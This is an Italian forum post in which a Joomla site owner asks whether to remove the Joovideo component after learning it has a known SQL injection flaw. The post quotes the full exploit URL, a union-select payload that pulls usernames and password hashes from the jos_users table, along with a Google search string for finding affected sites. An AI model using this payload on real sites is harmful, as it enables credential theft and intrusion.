Vedendo i report di Google Analytics [fonti traffico--->keywords] ho scoperto che qualcuno era particolarmente interessato al componente Joovideo.
Eseguendo la ricerca su google con stringa inurl:com_joovideo ho capito perchè.
Cercavano una vulnerabilità Sql [ SQL injection vulnerability in the Joovideo (com_joovideo) 1.0 and 1.2.2 component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL.]
L'hack consiste in questo:
EXPLOIT :
index.php?option=com_joovideo&Itemid=S@BUN&task=detail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*
Credits to [
http://my.opera.com/SQL-Injection/blog/]
Ho provato ad eseguire il link sul sito in cui ho il componente ma nessun tipo di problema riscontrato se non un errore del tipo:
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /web/htdocs/www.xxxxxxx.org/home/components/com_joovideo/sub_viewdetails.php on line 63
Che devo fare?
Disinstallo e cambio componente oppure lo lascio ?
Grazie
